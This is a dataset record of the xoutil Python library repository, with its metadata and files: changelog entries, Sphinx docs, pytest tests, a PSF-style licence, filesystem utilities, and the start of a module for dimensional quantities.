repo_name
stringlengths
5
114
repo_url
stringlengths
24
133
snapshot_id
stringlengths
40
40
revision_id
stringlengths
40
40
directory_id
stringlengths
40
40
branch_name
stringclasses
209 values
visit_date
timestamp[ns]
revision_date
timestamp[ns]
committer_date
timestamp[ns]
github_id
int64
9.83k
683M
star_events_count
int64
0
22.6k
fork_events_count
int64
0
4.15k
gha_license_id
stringclasses
17 values
gha_created_at
timestamp[ns]
gha_updated_at
timestamp[ns]
gha_pushed_at
timestamp[ns]
gha_language
stringclasses
115 values
files
listlengths
1
13.2k
num_files
int64
1
13.2k
merchise-autrement/xoutil
https://github.com/merchise-autrement/xoutil
c049636c930426dfe0c22aad0b1bffa373ffc7c9
afe1e2f2baa936b4561dc95dcea158050e8a2193
c401e473c11ec0ba2695dceed61ccc15397e3e35
refs/heads/master
2020-04-12T01:29:50.013978
2020-03-10T20:12:15
2020-03-10T20:12:15
4,931,268
2
3
null
null
null
null
null
[ { "alpha_fraction": 0.6202531456947327, "alphanum_fraction": 0.6962025165557861, "avg_line_length": 78, "blob_id": "f750326605b355430a3690ce59adc64294858d32", "content_id": "312487f5d3186c8f9ea26096589866a4272fd974", "detected_licenses": [ "Python-2.0", "LicenseRef-scancode-unknown-license-reference" ], "is_generated": false, "is_vendor": false, "language": "reStructuredText", "length_bytes": 79, "license_type": "permissive", "max_line_length": 78, "num_lines": 1, "path": "/docs/source/history/_changes-2.0.2.rst", "repo_name": "merchise-autrement/xoutil", "src_encoding": "UTF-8", "text": "- Incorporates all (applicable) changes from `release 1.9.2 <rel-1.9.2>`:ref:.\n" }, { "alpha_fraction": 0.5045871734619141, "alphanum_fraction": 0.5091742873191833, "avg_line_length": 15.769230842590332, "blob_id": "a0a6481728b81ebc297a72f96d9b84f2bd226037", "content_id": "c4fb0d9575539fbeff97fbf63c7b2163f7c76167", "detected_licenses": [ "Python-2.0", "LicenseRef-scancode-unknown-license-reference" ], "is_generated": false, "is_vendor": false, "language": "reStructuredText", "length_bytes": 218, "license_type": "permissive", "max_line_length": 48, "num_lines": 13, "path": "/docs/source/xotl.tools/validators.rst", "repo_name": "merchise-autrement/xoutil", "src_encoding": "UTF-8", "text": "`xotl.tools.validators`:mod: -- value validators\n================================================\n\n.. automodule:: xotl.tools.validators\n :members:\n\nContents:\n\n.. toctree::\n :maxdepth: 1\n :glob:\n\n validators/*\n" }, { "alpha_fraction": 0.5764994025230408, "alphanum_fraction": 0.5777233839035034, "avg_line_length": 21.08108139038086, "blob_id": "09863126cd3e9a1f2d2659dc2009aca1e8161288", "content_id": "61b01fad7b201c8560b4ac1ec1ec9532c08cc174", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 818, "license_type": "no_license", "max_line_length": 72, "num_lines": 37, "path": "/tests/test_cli.py", "repo_name": "merchise-autrement/xoutil", "src_encoding": "UTF-8", "text": "#!/usr/bin/env python\n# -*- coding: utf-8 -*-\n# ---------------------------------------------------------------------\n# Copyright (c) Merchise Autrement [~º/~] and Contributors\n# All rights reserved.\n#\n# This is free software; you can do what the LICENCE file allows you to.\n#\n\nimport pytest\n\n\ndef test_regression_Command_repr():\n from xoutil.cli import Command\n\n class MyCommand(Command):\n def run(self):\n pass\n\n class Hidden(object):\n def run(self):\n pass\n\n Command.register(Hidden)\n\n cmd = MyCommand()\n assert repr(cmd) != \"\"\n registry = Command.registry\n assert registry.get(\"my-command\")\n assert registry.get(\"hidden\")\n\n\ndef test_can_actually_run_the_help():\n from xoutil.cli.app import main\n\n with pytest.raises(SystemExit):\n main(default=\"help\")\n" }, { "alpha_fraction": 0.5779816508293152, "alphanum_fraction": 0.5802752375602722, "avg_line_length": 28.066667556762695, "blob_id": "ceaae0cd974ccf443c1a4512a3db05f10f77fa48", "content_id": "d105f18cc7e6ab31a90d133d67f123b9ab4873c1", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 437, "license_type": "no_license", "max_line_length": 78, "num_lines": 15, "path": "/xotl/tools/fp/__init__.py", "repo_name": "merchise-autrement/xoutil", "src_encoding": "UTF-8", "text": "#!/usr/bin/env python\n# -*- coding: utf-8 -*-\n# ---------------------------------------------------------------------\n# Copyright (c) Merchise Autrement [~º/~] and Contributors\n# All rights reserved.\n#\n# This is free software; you can do what the LICENCE file allows you to.\n#\n\n\"\"\"Advanced functional programming in Python.\n\n.. note:: This module is in **EXPERIMENTAL** state, we encourage not to use it\n before declared stable.\n\n\"\"\"\n" }, { "alpha_fraction": 0.7225806713104248, "alphanum_fraction": 0.7225806713104248, "avg_line_length": 37.75, "blob_id": "14f4dfc135ee9f5a5b75b5475f81748464afd162", "content_id": "28e5a5eba511ef89a65bac34fe5c9f73a4b61b71", "detected_licenses": [ "Python-2.0", "LicenseRef-scancode-unknown-license-reference" ], "is_generated": false, "is_vendor": false, "language": "reStructuredText", "length_bytes": 155, "license_type": "permissive", "max_line_length": 66, "num_lines": 4, "path": "/docs/source/history/_changes-1.7.7.rst", "repo_name": "merchise-autrement/xoutil", "src_encoding": "UTF-8", "text": "- Fixed bug in `xoutil.datetime.date`:class: that prevented to use\n ``strftime()`` in subclasses.\n\n- Fixed bug in `xoutil.datetime.TimeSpan.valid`:meth:.\n" }, { "alpha_fraction": 0.5492101907730103, "alphanum_fraction": 0.5681652426719666, "avg_line_length": 28.60431671142578, "blob_id": "5d01b23487ef7de2ae4846f766c71b80a675f3f3", "content_id": "36c4fe34c38fed6942ec55f1d39419627acb8bb8", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 4116, "license_type": "no_license", "max_line_length": 79, "num_lines": 139, "path": "/tests/test_fp.py", "repo_name": "merchise-autrement/xoutil", "src_encoding": "UTF-8", "text": "#!/usr/bin/env python3\n# -*- coding: utf-8 -*-\n# ---------------------------------------------------------------------\n# Copyright (c) Merchise Autrement [~º/~] and Contributors\n# All rights reserved.\n#\n# This is free software; you can do what the LICENCE file allows you to.\n#\nfrom hypothesis import strategies as s, given, example\n\n\ndef test_fp_compose():\n from xoutil.fp.tools import identity, compose, pos_args, kw_args, full_args\n\n x, obj = 15, object()\n f, g, h = x.__add__, x.__mul__, x.__xor__\n\n def join(*args):\n if args:\n return \" -- \".join(str(arg) for arg in args)\n # functions return 'None' when no explicit 'return' is issued.\n\n def plus2(value):\n return value + 2\n\n def plus2d(value):\n return {\"stop\": value + 2}\n\n def myrange(stop):\n return list(range(stop))\n\n assert compose(join, pos_args, myrange, plus2)(0) == \"0 -- 1\"\n assert compose(join, myrange, plus2)(0) == \"[0, 1]\"\n\n assert compose(join, myrange, kw_args, plus2d)(0) == \"[0, 1]\"\n assert compose(join, myrange, full_args.parse, plus2d)(0) == \"[0, 1]\"\n\n assert compose() is identity\n assert compose()(x) is x\n assert compose()(obj) is obj\n assert compose(f) is f\n assert compose(g, f)(x) == g(f(x))\n assert compose(h, g, f)(x) == h(g(f(x)))\n\n\ndef test_fp_compose_wrapable():\n from functools import wraps\n from xoutil.fp.tools import compose\n\n def wrapper():\n \"X\"\n pass\n\n res = wraps(wrapper)(compose(wrapper, lambda: None))\n assert res.__name__ == wrapper.__name__\n assert res.__doc__ == wrapper.__doc__\n assert res.__module__ == wrapper.__module__\n\n\ndef test_fp_tools():\n from xoutil.fp.tools import identity, compose\n\n x, obj = 15, object()\n f, g, h = x.__add__, x.__mul__, x.__xor__\n\n def join(*args):\n if args:\n return \" -- \".join(str(arg) for arg in args)\n # functions return 'None' when no explicit 'return' is issued.\n\n def plus2(value):\n return value + 2\n\n def plus2d(value):\n return {\"stop\": value + 2}\n\n def myrange(stop):\n return list(range(stop))\n\n assert compose(join, myrange, plus2)(0) == \"[0, 1]\"\n assert compose() is identity\n assert compose()(x) is x\n assert compose()(obj) is obj\n assert compose(f) is f\n assert compose(g, f)(x) == g(f(x))\n assert compose(h, g, f)(x) == h(g(f(x)))\n\n c = compose(*((lambda y: lambda x: x + y)(i) for i in range(6)))\n for i in range(7):\n assert c[:i](0) == sum(range(i))\n\n\n@given(s.integers(min_value=0, max_value=20))\n@example(4)\ndef test_fp_kleisli_compose(n):\n from xoutil.fp.iterators import kleisli_compose\n\n def fullrange(n):\n \"[0..n]\"\n return range(n + 1)\n\n def odds(n):\n return [x for x in fullrange(n) if x % 2 != 0]\n\n odd_seqs = kleisli_compose(odds, fullrange)\n assert list(odd_seqs(n)) == [z for y in fullrange(n) for z in odds(y)]\n id_ = lambda x: [x]\n pad = (id_,) * n\n args = pad + (odds,) + pad + (fullrange,) + pad\n odd_seqs = kleisli_compose(*args)\n assert list(odd_seqs(n)) == [z for y in fullrange(n) for z in odds(y)]\n\n odd_seqs = kleisli_compose(fullrange, odds)\n assert list(odd_seqs(n)) == [z for y in odds(n) for z in fullrange(y)]\n args = pad + (fullrange,) + pad + (odds,) + pad\n odd_seqs = kleisli_compose(*args)\n assert list(odd_seqs(n)) == [z for y in odds(n) for z in fullrange(y)]\n\n\ndef test_fp_kleisli_compose4():\n from xoutil.fp.iterators import kleisli_compose\n\n def fullrange(n):\n \"[0..n]\"\n return range(n + 1)\n\n def odds(n):\n return [x for x in fullrange(n) if x % 2 != 0]\n\n id_ = lambda x: [x]\n odd_seqs = kleisli_compose(odds, fullrange)\n assert list(odd_seqs(4)) == [1, 1, 1, 3, 1, 3]\n odd_seqs = kleisli_compose(id_, odds, id_, id_, fullrange, id_)\n assert list(odd_seqs(4)) == [1, 1, 1, 3, 1, 3]\n\n odd_seqs = kleisli_compose(fullrange, odds)\n assert list(odd_seqs(4)) == [0, 1, 0, 1, 2, 3]\n odd_seqs = kleisli_compose(id_, fullrange, id_, id_, odds, id_)\n assert list(odd_seqs(4)) == [0, 1, 0, 1, 2, 3]\n" }, { "alpha_fraction": 0.7778534889221191, "alphanum_fraction": 0.7850084900856018, "avg_line_length": 41.536231994628906, "blob_id": "270688b27d78805e4845c806b490af0d07681640", "content_id": "5870c74e816625f054b6f316b05fa46034ede29b", "detected_licenses": [ "Python-2.0", "LicenseRef-scancode-unknown-license-reference" ], "is_generated": false, "is_vendor": false, "language": "reStructuredText", "length_bytes": 2936, "license_type": "permissive", "max_line_length": 76, "num_lines": 69, "path": "/docs/source/LICENSE.rst", "repo_name": "merchise-autrement/xoutil", "src_encoding": "UTF-8", "text": "Copyright and Licence\n=====================\n\nCopyright (c) 2013-2017 Merchise Autrement [~º/~] and Contributors.\n\nCopyright (c) 2012 Medardo Rodríguez.\n\nThis software is released under terms similar to the Python Software\nFoundation (PSF) licence for Python 3.2 as stated `below\n<merchise-license-psf>`:ref:.\n\nThree modules inside this package are backports from Python 3.2.3's standard\nlibrary and the PSF retains the copyright.\n\n.. |project| replace:: xoutil\n\n.. |copyright| replace:: Copyright (c) 2015 Merchise and Contributors\n\n.. _merchise-license-psf:\n\nLicense Terms\n-------------\n\nThis LICENSE AGREEMENT is between the Copyright Owner (Owner or\nAuthor), and the Individual or Organization (\"Licensee\") accessing and\notherwise using |project| |release| software in source or binary form\nand its associated documentation.\n\nSubject to the terms and conditions of this License Agreement, the\nOwner hereby grants Licensee a nonexclusive, royalty-free, world-wide\nlicense to reproduce, analyze, test, perform and/or display publicly,\nprepare derivative works, distribute, and otherwise use |project|\n|release| alone or in any derivative version, provided, however, that\nOwner's License Agreement and Owner's notice of copyright, i.e.,\n\"|copyright|\" are retained in |project| |release| alone or in any\nderivative version prepared by Licensee.\n\nIn the event Licensee prepares a derivative work that is based on or\nincorporates |project| |release| or any part thereof, and wants to\nmake the derivative work available to others as provided herein, then\nLicensee hereby agrees to include in any such work a brief summary of\nthe changes made to |project| |release|.\n\nThe Owner is making |project| |release| available to Licensee on an\n\"AS IS\" basis. THE OWNER MAKES NO REPRESENTATIONS OR WARRANTIES,\nEXPRESS OR IMPLIED. BY WAY OF EXAMPLE, BUT NOT LIMITATION, THE OWNER\nMAKES NO AND DISCLAIMS ANY REPRESENTATION OR WARRANTY OF\nMERCHANTABILITY OR FITNESS FOR ANY PARTICULAR PURPOSE OR THAT THE USE\nOF |project| |release| WILL NOT INFRINGE ANY THIRD PARTY RIGHTS.\n\nTHE OWNER SHALL NOT BE LIABLE TO LICENSEE OR ANY OTHER USERS OF\n|project| |release| FOR ANY INCIDENTAL, SPECIAL, OR CONSEQUENTIAL\nDAMAGES OR LOSS AS A RESULT OF MODIFYING, DISTRIBUTING, OR OTHERWISE\nUSING |project| |release|, OR ANY DERIVATIVE THEREOF, EVEN IF ADVISED\nOF THE POSSIBILITY THEREOF.\n\nThis License Agreement will automatically terminate upon a material\nbreach of its terms and conditions.\n\nNothing in this License Agreement shall be deemed to create any\nrelationship of agency, partnership, or joint venture between The\nOwner and Licensee. This License Agreement does not grant permission\nto use The Owner trademarks or trade name in a trademark sense to\nendorse or promote products or services of Licensee, or any third\nparty.\n\nBy copying, installing or otherwise using |project| |release|,\nLicensee agrees to be bound by the terms and conditions of this\nLicense Agreement.\n" }, { "alpha_fraction": 0.464530885219574, "alphanum_fraction": 0.471395879983902, "avg_line_length": 42.70000076293945, "blob_id": "064a0590cd650dc9026a2bb28b71b83ec31aa098", "content_id": "d52e0c4db02731e07a23cd95e2978f1ba3bfc180", "detected_licenses": [ "Python-2.0", "LicenseRef-scancode-unknown-license-reference" ], "is_generated": false, "is_vendor": false, "language": "reStructuredText", "length_bytes": 437, "license_type": "permissive", "max_line_length": 81, "num_lines": 10, "path": "/docs/source/xotl.tools/fp/iterators.rst", "repo_name": "merchise-autrement/xoutil", "src_encoding": "UTF-8", "text": "=============================================================================\n `xotl.tools.fp.iterators`:mod: -- High-level functional tools for iterators\n=============================================================================\n\n.. automodule:: xotl.tools.fp.iterators\n :members: kleisli_compose, kleisli_compose_foldl\n\n.. function:: iter_compose\n\n .. deprecated:: 1.9.7 Alias of `xotl.tools.fp.iterators.kleisli_compose`:func:\n" }, { "alpha_fraction": 0.5839133262634277, "alphanum_fraction": 0.5877872705459595, "avg_line_length": 28.63035011291504, "blob_id": "41093e7ee270858ef47933a989a11799c32987d3", "content_id": "6e5e226c1c90b967ed8c800afd0ca6e96417ba6e", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 15232, "license_type": "no_license", "max_line_length": 87, "num_lines": 514, "path": "/xotl/tools/fs/__init__.py", "repo_name": "merchise-autrement/xoutil", "src_encoding": "UTF-8", "text": "#!/usr/bin/env python\n# -*- coding: utf-8 -*-\n# ---------------------------------------------------------------------\n# Copyright (c) Merchise Autrement [~º/~] and Contributors\n# All rights reserved.\n#\n# This is free software; you can do what the LICENCE file allows you to.\n#\n\n\"\"\"File system utilities.\n\nThis module contains file-system utilities that could have side-effects. For\npath-handling functions that have no side-effects look at\n`xotl.tools.fs.path`:mod:.\n\n\"\"\"\n\n\nimport sys\nimport os\nfrom re import compile as _rcompile\nfrom xotl.tools.fs.path import normalize_path\n\n\nre_magic = _rcompile(\"[*?[]\")\nhas_magic = lambda s: re_magic.search(s) is not None\n\n\ndef _get_regex(pattern=None, regex_pattern=None, shell_pattern=None):\n from functools import reduce\n import fnmatch\n from xotl.tools.params import check_count\n\n arg_count = reduce(\n lambda count, p: count + (1 if p is not None else 0),\n (pattern, regex_pattern, shell_pattern),\n 0,\n )\n check_count(arg_count, 0, 1, caller=\"_get_regex\") # XXX: WTF?!\n if arg_count == 1:\n if pattern is not None:\n if pattern.startswith(\"(?\") or pattern.startswith(\"^(?\"):\n regex_pattern = pattern\n else:\n shell_pattern = pattern\n return _rcompile(regex_pattern or fnmatch.translate(shell_pattern))\n elif arg_count == 0:\n return None\n\n\ndef iter_files(\n top=\".\",\n pattern=None,\n regex_pattern=None,\n shell_pattern=None,\n followlinks=False,\n maxdepth=None,\n):\n \"\"\"Iterate filenames recursively.\n\n :param top: The top directory for recurse into.\n :param pattern: A pattern of the files you want to get from the iterator.\n It should be a string. If it starts with \"(?\" it will be\n regarded as a regular expression, otherwise a shell\n pattern.\n\n :param regex_pattern: An *alternative* to `pattern`. This will always be\n regarded as a regular expression.\n\n :param shell_pattern: An *alternative* to `pattern`. This should be a\n shell pattern.\n\n :param followlinks: The same meaning that in `os.walk`.\n\n :param maxdepth: Only files above this level will be yielded. If None, no\n limit is placed.\n\n .. warning:: It's an error to pass more than pattern argument.\n\n .. versionchanged:: 1.2.1 Added parameters `followlinks` and `maxdepth`.\n\n \"\"\"\n regex = _get_regex(pattern, regex_pattern, shell_pattern)\n depth = 0\n for dirpath, _dirs, filenames in os.walk(\n normalize_path(top), topdown=True, followlinks=followlinks\n ):\n for filename in filenames:\n path = os.path.join(dirpath, filename)\n if (regex is None) or regex.search(path):\n yield path\n if maxdepth is not None:\n depth += 1\n if depth >= maxdepth:\n _dirs[:] = []\n\n\n# ------------------------------ iter_dict_files ------------------------------\n_REGEX_PYTHON_PACKAGE = _rcompile(\n r\"^(?P<dir>.+(?=/)/)?\"\n r\"(?P<packagename>[^/_-]+?)\"\n r\"([-_][Vv]?(?P<version>\\d+([.-_]\\w+)*))?\"\n r\"(?P<ext>[.](tar[.](gz|bz2)|zip|egg|tgz))$\"\n)\n\n_REGEX_DEFAULT_ALLFILES = _rcompile(\n r\"^(?P<dir>.+(?=/)/)?\" r\"(?P<filename>[^/]+?)\" r\"([.](?P<ext>[^.]+))?$\"\n)\n\n\ndef iter_dict_files(top=\".\", regex=None, wrong=None, followlinks=False):\n \"\"\"\n Iterate filenames recursively.\n\n :param top: The top directory for recurse into.\n\n :param regex: Regular expression with group definitions to match.\n\n :param wrong: A key to store full name of not matching files.\n\n :param followlinks: The same meaning that in `os.walk`.\n\n .. versionadded:: 1.2.0\n\n .. versionchanged:: 1.2.1 Added parameter `followlinks`.\n\n \"\"\"\n if regex:\n if isinstance(regex, str):\n regex = _rcompile(regex)\n else:\n regex = _REGEX_DEFAULT_ALLFILES\n for dirpath, _dirs, filenames in os.walk(\n normalize_path(top), followlinks=followlinks\n ):\n for filename in filenames:\n path = os.path.join(dirpath, filename)\n match = regex.match(path)\n if match:\n yield match.groupdict()\n elif wrong is not None:\n yield {wrong: path}\n\n\ndef iter_dirs(top=\".\", pattern=None, regex_pattern=None, shell_pattern=None):\n \"\"\"\n Iterate directories recursively.\n\n The params have analagous meaning that in `iter_files`:func: and the same\n restrictions.\n\n \"\"\"\n regex = _get_regex(pattern, regex_pattern, shell_pattern)\n for path, _dirs, _files in os.walk(normalize_path(top)):\n if (regex is None) or regex.search(path):\n yield path\n\n\ndef rmdirs(\n top=\".\",\n pattern=None,\n regex_pattern=None,\n shell_pattern=None,\n exclude=None,\n confirm=None,\n):\n \"\"\"Removes all empty dirs at `top`.\n\n :param top: The top directory to recurse into.\n\n :param pattern: A pattern of the dirs you want to remove.\n It should be a string. If it starts with \"(?\" it will be\n regarded as a regular expression, otherwise a shell\n pattern.\n\n :param exclude: A pattern of the dirs you DON'T want to remove. It should\n be a string. If it starts with \"(?\" it will be regarded as\n a regular expression, otherwise a shell pattern. This is a\n simple commodity to have you not to negate complex\n patterns.\n\n :param regex_pattern: An *alternative* to `pattern`. This will always be\n regarded as a regular expression.\n\n :param shell_pattern: An *alternative* to `pattern`. This should be a\n shell pattern.\n\n :param confirm: A callable that accepts a single argument, which is\n the path of the directory to be deleted. `confirm`\n should return True to allow the directory to be\n deleted. If `confirm` is None, then all matched dirs\n are deleted.\n\n .. note:: In order to avoid common mistakes we won't attempt to\n remove mount points.\n\n .. versionadded:: 1.1.3\n\n \"\"\"\n regex = _get_regex(pattern, regex_pattern, shell_pattern)\n exclude = _get_regex(exclude)\n if confirm is None:\n confirm = lambda _: True\n for path, _dirs, _files in os.walk(normalize_path(top)):\n # XXX: Make clearest next condition\n if (\n (regex is None or regex.search(path))\n and (exclude is None or not exclude.search(path))\n and not _dirs\n and not _files\n and confirm(path)\n and not os.path.ismount(path)\n ):\n os.rmdir(path)\n\n\ndef regex_rename(top, pattern, repl, maxdepth=None):\n \"\"\"Rename files recursively using regular expressions substitution.\n\n :param top: The top directory to start walking.\n\n :param pattern: A regular expression pattern. Files whose fullname\n (including the path) match the expression will be renamed.\n\n :param repl: String to use as replacement. You may use backreferences as\n documented in python's ``re.sub`` function.\n\n :param maxdepth: Only walk files up to this level. If None, walk all\n files.\n\n .. versionadded:: 1.2.1\n\n \"\"\"\n from re import subn as _re_subn\n\n if isinstance(pattern, str):\n pattern = _rcompile(pattern)\n depth = 0\n for path, _dirs, files in os.walk(top):\n for item in files:\n new_file, count = _re_subn(pattern, repl, item)\n if count > 0:\n old = os.path.join(path, item)\n new = os.path.join(path, new_file)\n os.rename(old, new)\n if maxdepth is not None:\n depth += 1\n if depth >= maxdepth:\n _dirs[:] = []\n\n\nfilter_not_hidden = lambda path, _st: (path[0] != \".\") and (\"/.\" not in path)\nfilter_false = lambda path, stat_info: False\n\n\ndef get_regex_filter(regex):\n \"\"\"Return a filter for \"walk\" based on a regular expression.\"\"\"\n if isinstance(regex, str):\n regex = _rcompile(regex)\n\n def _filter(path, stat_info):\n return regex.match(os.path.basename(path)) is not None\n\n return _filter\n\n\ndef get_wildcard_filter(pattern):\n \"\"\"Return a filter for \"walk\" based on a wildcard pattern a la fnmatch.\"\"\"\n regex = _get_regex(pattern)\n\n def _filter(path, stat_info):\n return regex.match(os.path.basename(path)) is not None\n\n return _filter\n\n\ndef get_mime_filter(mime_start):\n import mimetypes\n\n def _filter(path, stat_info):\n t = mimetypes.guess_type(path)[0]\n return t.startswith(mime_start) if t else False\n\n return _filter\n\n\ndef nice_size(size):\n \"\"\"Formats `size` to a nice human-friendly format by appending one of `Kilo`,\n `Mega`, `Giga`, `Tera`, `Peta`, or `Eta` suffix.\n\n \"\"\"\n tails = \" KMGTPE\"\n order, highest = 0, len(tails) - 1\n while (size >= 1024) and (order < highest):\n size /= 1024\n order += 1\n res = (\"%.2f\" % size).rstrip(\"0\").rstrip(\".\")\n return \"%s%s\" % (res, tails[order])\n\n\ndef stat(path):\n \"\"\"\n Return file or file system status.\n\n This is the same as the function ``os.stat`` but raises no error.\n \"\"\"\n try:\n return os.stat(path)\n except os.error:\n return None\n\n\ndef lstat(path):\n \"\"\"Same as `os.lstat`, but raises no error.\"\"\"\n try:\n return os.lstat(path)\n except os.error:\n return None\n\n\ndef set_stat(fname, stat_info):\n os.chmod(fname, stat_info.st_mode)\n os.chown(fname, stat_info.st_uid, stat_info.st_gid)\n os.utime(fname, (stat_info.st_atime, stat_info.st_mtime))\n\n\ndef read_file(path):\n \"\"\"Read a full file content and return an string.\"\"\"\n try:\n with open(path, \"r\") as f:\n return f.read()\n except OSError:\n return \"\"\n\n\ndef listdir(path):\n \"\"\"Same as ``os.listdir`` but normalizes `path` and raises no error.\"\"\"\n try:\n return os.listdir(normalize_path(path))\n except os.error:\n return []\n\n\ndef _list_magic(dirname, pattern):\n re = _get_regex(pattern)\n for name in listdir(dirname or os.curdir):\n if re.match(name):\n full = os.path.join(dirname, name)\n yield full, lstat(full)\n\n\ndef _list_one(fname):\n st = lstat(fname)\n if st:\n yield fname, st\n\n\ndef _list(pattern):\n from stat import S_ISDIR as _ISDIR\n\n if has_magic(pattern):\n head, tail = os.path.split(pattern)\n for dirname, st in _list(head):\n if _ISDIR(st.st_mode):\n if has_magic(tail):\n items = _list_magic(dirname, tail)\n elif tail:\n items = _list_one(os.path.join(dirname, tail))\n else:\n items = ((dirname, st),)\n for item in items:\n yield item\n elif pattern:\n for item in _list_one(pattern):\n yield item\n else:\n yield (\"\", lstat(os.curdir))\n\n\ndef imap(func, pattern):\n r\"\"\"Yields `func(file_0, stat_0)`, `func(file_1, stat_1)`, ... for each dir\n path. The `pattern` may contain:\n\n - Simple shell-style wild-cards à la `fnmatch`.\n\n - Regex if pattern starts with '(?'. Expressions must be valid, as\n in \"(?:[^.].*)$\" or \"(?i).*\\.jpe?g$\". Remember to add the end mark '$'\n if needed.\n\n \"\"\"\n for item, st in _list(pattern):\n res = func(item, st)\n if res is not None:\n yield res\n\n\ndef walk_up(start, sentinel):\n \"\"\"Given a `start` directory walk-up the file system tree until either the\n FS root is reached or the `sentinel` is found.\n\n The `sentinel` must be a string containing the file name to be found.\n\n .. warning:: If `sentinel` is an absolute path that exists this will return\n `start`, no matter what `start` is (in windows this could be even\n different drives).\n\n If `start` path exists but is not a directory an OSError is raised.\n\n \"\"\"\n from os.path import abspath, exists, isdir, join, dirname\n\n current = abspath(start)\n if not exists(current) or not isdir(current):\n raise OSError('Invalid directory \"%s\"' % current)\n previouspath = None\n found = False\n while not found and current is not previouspath:\n clue = join(current, sentinel)\n if exists(clue):\n found = True\n else:\n previouspath = current\n current = dirname(current)\n return current if found else None\n\n\nfrom os import makedirs\n\n\ndef ensure_filename(filename, yields=False):\n \"\"\"Ensures the existence of a file with a given filename.\n\n If the filename is taken and is not pointing to a file (or a link to a\n file) an OSError is raised. If `exist_ok` is False the filename must not\n be taken; an OSError is raised otherwise.\n\n The function creates all directories if needed. See `makedirs`:func: for\n restrictions.\n\n If `yields` is True, returns the file object. This way you may open a\n file for writing like this::\n\n with ensure_filename('/tmp/good-name-87.txt', yields=True) as fh:\n fh.write('Do it!')\n\n The file is open in mode 'w+b'.\n\n .. versionadded:: 1.6.1 Added parameter `yield`.\n\n \"\"\"\n if not os.path.exists(filename):\n filename = normalize_path(filename)\n dirname = os.path.dirname(filename)\n makedirs(dirname, exist_ok=True)\n # TODO: Better hanlding of mode for reading/writing.\n fh = open(filename, \"w+b\")\n if not yields:\n fh.close()\n else:\n return fh\n else:\n if not os.path.isfile(filename):\n raise OSError(\"Expected a file but another thing is found '%s'\" % filename)\n\n\ndef concatfiles(*files):\n \"\"\"Concat several files to a single one.\n\n Each positional argument must be either:\n\n - a file-like object (ready to be passed to `shutil.copyfileobj`:func:)\n\n - a string, the file path.\n\n The last positional argument is the target. If it's file-like object it\n must be open for writing, and the caller is the responsible for closing\n it.\n\n Alternatively if there are only two positional arguments and the first is\n a collection, the sources will be the members of the first argument.\n\n \"\"\"\n import shutil\n from xotl.tools.values.simple import force_iterable_coerce\n from xotl.tools.params import check_count\n\n check_count(files, 2, caller=\"concatfiles\")\n if len(files) == 2:\n files, target = force_iterable_coerce(files[0]), files[1]\n else:\n files, target = files[:-1], files[-1]\n if isinstance(target, str):\n target, opened = open(target, \"wb\"), True\n else:\n opened = False\n try:\n for f in files:\n if isinstance(f, str):\n fh = open(f, \"rb\")\n closefh = True\n else:\n fh = f\n closefh = False\n try:\n shutil.copyfileobj(fh, target)\n finally:\n if closefh:\n fh.close()\n finally:\n if opened:\n target.close()\n\n\ndel sys\n" }, { "alpha_fraction": 0.5676842927932739, "alphanum_fraction": 0.571664571762085, "avg_line_length": 30.703571319580078, "blob_id": "c525bd504844888e0a060ba502fa63291c480992", "content_id": "fb79a0fa85331dc63daa53dd0496dcba0eecdc43", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 26633, "license_type": "no_license", "max_line_length": 87, "num_lines": 840, "path": "/xotl/tools/dim/meta.py", "repo_name": "merchise-autrement/xoutil", "src_encoding": "UTF-8", "text": "#!/usr/bin/env python\n# -*- coding: utf-8 -*-\n# ---------------------------------------------------------------------\n# Copyright (c) Merchise Autrement [~º/~] and Contributors\n# All rights reserved.\n#\n# This is free software; you can do what the LICENCE file allows you to.\n#\n\nr\"\"\"Facilities to work with `concrete numbers`_.\n\n A concrete number is a number associated with the things being counted, in\n contrast to an abstract number which is a number as a single entity.\n\n -- Wikipedia__\n\n\n__ `concrete numbers`_\n.. _concrete numbers: https://en.wikipedia.org/wiki/Concrete_number\n\n\nThis module allows you to define dimensions (or quantity types):\n\n >>> from xotl.tools.dim.meta import Dimension, UNIT\n >>> @Dimension.new\n ... class Length:\n ... metre = UNIT\n ... kilometre = 1000 * metre\n ... centimetre = metre/100\n ... milimetre = milimetres = metre/1000\n ...\n ... inch = inches = 24.5 * milimetres\n ... foot = feet = 12 * inches\n\n\n.. seealso:: Module `~xotl.tools.dim.base`:mod: defines the standard base\n quantities.\n\n\nEach dimension **must** define a single *canonical unit* for measuring\nquantities within the dimension. Values in the dimension are always expressed\nin terms of the canonical units.\n\nIn the previous example the dimension Length defined the `metre` for its\ncanonical unit. The name of canonical unit defines the `signature\n<Signature>`:class: for the quantities in the dimension.\n\nWhen printed (or ``repr``-ed) `quantities <Quantity>`:class: use the format\n``<magnitude>::<signature>``:\n\n >>> metre = Length.metre\n >>> metre\n 1::{<Length.metre>}/{}\n\nQuantities support the standard arithmetical operations of addition,\nsubtraction, multiplication and division. In fact, you obtain different\nquantities in the dimension by multiplying with the canonical unit:\n\n >>> metre + metre\n 2::{<Length.metre>}/{}\n\n >>> metre*metre\n 1::{<Length.metre>, <Length.metre>}/{}\n\n >>> km = 1000 * metre\n\n >>> 5 * km\n 5000::{<Length.metre>}/{}\n\n`Dimensional homogeneity`__ imposes restrictions on the allowed operations\nbetween quantities. Only commensurable quantities (quantities of the same\ndimension) can be compared, equated, added, or subtracted.\n\n__ https://en.wikipedia.org/wiki/Dimensional_analysis#Dimensional_homogeneity\n\n >>> @Dimension.new\n >>> class Time:\n ... second = UNIT\n\n >>> metre + Time.second # doctest: +ELLIPSIS\n Traceback (...)\n ...\n OperandTypeError: unsupported operand type(s) for +:...\n\n\nHowever, you can take ratios of incommensurable quantities (quantities with\ndifferent dimensions), and multiply or divide them.\n\n >>> metre/Time.second\n >>> 1::{<Length.metre>}/{<Time.second>}\n\n\n.. warning:: `Decimal numbers <decimal.Decimal>`:py:class: are not supported.\n\n This module makes not attempt to fix the standing incompatibility between\n floats and `decimal.Decimal`:py:class:\\ :\n\n >>> import decimal\n >>> decimal.Decimal('0') + 0.1 # doctest: +ELLIPSIS\n Traceback (...)\n ...\n TypeError: unsupported operand type(s) for +: 'Decimal' and 'float'\n\n\nThe signature created by 